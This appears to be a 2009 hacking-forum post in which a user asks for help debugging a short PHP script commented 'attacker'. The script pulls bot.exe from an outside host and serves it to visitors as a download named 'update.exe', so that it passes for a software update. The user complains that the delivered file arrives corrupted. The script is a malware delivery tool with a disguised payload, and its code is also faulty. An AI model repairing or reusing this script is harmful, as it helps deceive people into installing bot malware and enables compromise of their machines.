Показать сообщение отдельно

fix bug in code plz
  #1  
Старый 17.04.2009, 01:28
darknetvn
Новичок
Регистрация: 13.01.2008
Сообщений: 2
С нами: 9645804

Репутация: 0
Lightbulb fix bug in code plz

code php

PHP код:
<?php    

// attacker

$bot 'http://www.bot1.cn/bot.exe';    // url of exe file    

header('Cache-Control: must-revalidate, post-check=0, pre-check=0');    
header('Content-Type: application/octet-stream');    
header('Content-Disposition: attachment; filename=update.exe');    
header('Content-Length: ' filesize($bot));    
readfile($bot);    
die;    

?>
when i run file php and check update.exe is file bad
bot.exe is can't loaded with original file and md5 checksum original

plz help me if you can ,thanks all
 
Ответить с цитированием